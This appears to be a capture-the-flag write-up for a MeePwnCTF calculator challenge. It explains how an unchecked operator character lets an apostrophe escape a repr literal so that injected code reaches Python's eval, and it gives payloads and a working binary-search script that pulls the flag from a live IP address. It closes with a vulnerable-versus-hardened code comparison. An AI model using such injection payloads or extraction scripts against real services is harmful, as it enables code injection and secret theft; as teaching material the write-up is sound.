`repr` returns a string that evaluates to a single-quoted string literal. For example, `repr("foo")` == `"'foo'"`. So for normal input, the string that gets evaluated looks like `"'value1'=='value2'"`.

The second character of `op` is unchecked, so you can use an apostrophe to break out of the second value's string literal: the apostrophe pairs with the literal's opening quote, and the rest of the second value is then evaluated as code. You can't use apostrophes within your values though, so to avoid an error, you can insert a `#` to comment out the tail of the string. For example, submitting `foo`, `+'`, and `+FLAG#` will evaluate `"'foo'+''+FLAG#'"`. This evaluates without error, but results in "Invalid" being output, since the result type is a string.

You need to extract the flag through expressions that evaluate to either numbers or booleans. If you need to use forbidden value characters, you can use the `source` variable in your expressions. A character-by-character binary search to fetch the entire flag can be done like this:
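```
import requests
from urllib.parse import quote_plus  # Python 3 location of quote_plus

known = 'MeePwnCTF{'
# The outer loop has no exit condition; stop the script manually.
while True:
    print(known)
    # Search the printable ASCII range for the next character.
    left = ord(' ')
    right = ord('~')
    while True:
        if left == right:
            known += chr(left)
            break
        # Upper midpoint; integer division keeps it usable with chr().
        middle = left + (right - left + 1) // 2
        guess = known + chr(middle)
        print('left {}, right {}, guessing {}'.format(chr(left), chr(right), guess))
        # The server evaluates 'Mee'+''+source<FLAG; source carries the guess
        # without its 'Mee' prefix, which value1 supplies.
        r = requests.get('http://178.128.96.203/cgi-bin/server.py?value1=Mee&op=%2B%27&value2=%2Bsource%3CFLAG%23&source=' + quote_plus(guess[3:]))
        isLess = 'True' in r.text
        if isLess:
            left = middle
        else:
            right = middle - 1
```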
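The flaw described above next to a hardened form, as an added example that is not the challenge's server code. `vulnerable_calc`, `safe_calc`, the operator set and the `FLAG` value are constructed assumptions that follow the behaviour the writeup describes (only the first character of `op` checked, `repr` on both values, non-numeric results reported as "Invalid").

```python
import operator

FLAG = "FLAG{constructed-placeholder}"  # constructed secret, not the real flag

# Hardened side: whole operator tokens mapped to functions (assumed operator set).
OPS = {"+": operator.add, "==": operator.eq, "!=": operator.ne,
       "<": operator.lt, ">": operator.gt}


def _numeric_only(result):
    """Mirror the described behaviour: non-numeric results become "Invalid"."""
    return result if isinstance(result, (bool, int, float)) else "Invalid"


def vulnerable_calc(value1, op, value2):
    """Assumed flaw: only the first character of op is validated before eval()."""
    if not op or op[0] not in "+=!<>":
        return "Invalid"
    expr = repr(value1) + op + repr(value2)  # op[1:] reaches the code unchecked
    try:
        return _numeric_only(eval(expr))
    except Exception:
        return "Invalid"


def safe_calc(value1, op, value2):
    """No eval(): op must match an allowlisted token exactly; values stay data."""
    fn = OPS.get(op)
    if fn is None:
        return "Invalid"
    return _numeric_only(fn(value1, value2))
```

With the inputs from the writeup, the `eval` version answers a comparison against `FLAG`, while the lookup version rejects the operator before any value is touched.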